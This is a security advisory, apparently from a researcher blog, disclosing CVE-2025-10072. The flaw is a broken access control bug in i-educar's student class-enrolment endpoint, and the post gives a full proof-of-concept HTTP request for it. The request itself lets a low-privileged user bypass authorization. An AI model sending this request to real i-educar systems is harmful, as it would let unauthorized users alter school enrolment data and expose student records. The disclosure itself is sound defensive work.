Featured image of post CVE-2025-10072

CVE-2025-10072

Broken Access Control

CVE-2025-10072: Broken Access Control in /matricula/[ID_STUDENT]/enturmar/[ID_CLASS] Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-10072

Summary

A Broken Access Control vulnerability was identified in the /matricula/[ID_STUDENT]/enturmar/[ID_CLASS] endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.

Details

Vulnerable Endpoint: GET /matricula/[ID_STUDENT]/enturmar/[ID_CLASS]
Authentication: Required

The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .

PoC

  • Authenticate as a non-privileged user.

  • Send the following request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
GET /matricula/206/enturmar/23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Referer: http://localhost/intranet/educar_matricula_turma_lst.php?ref_cod_matricula=206&ano_letivo=2025
Cookie: i_educar_session=Mz9IKWGOP641g4BLkSGRnxs69wk4ChmUUxUerX19
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

  • We could observe that we have access to the page and to the function to sign students from classes. And, this user, should not do that.

Impact

Broken Access Control vulnerabilities can have severe consequences, including:

  • Unauthorized access to restricted functionality;
  • Escalation of privileges for low-level users;
  • Exposure of sensitive data and potential system compromise;
  • Loss of confidentiality and integrity of educational records;
  • Reputational damage to the organization.

Reference

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10072.md

Finder

Marcelo Queiroz

By: CVE-Hunters

Built with Hugo
Theme Stack designed by Jimmy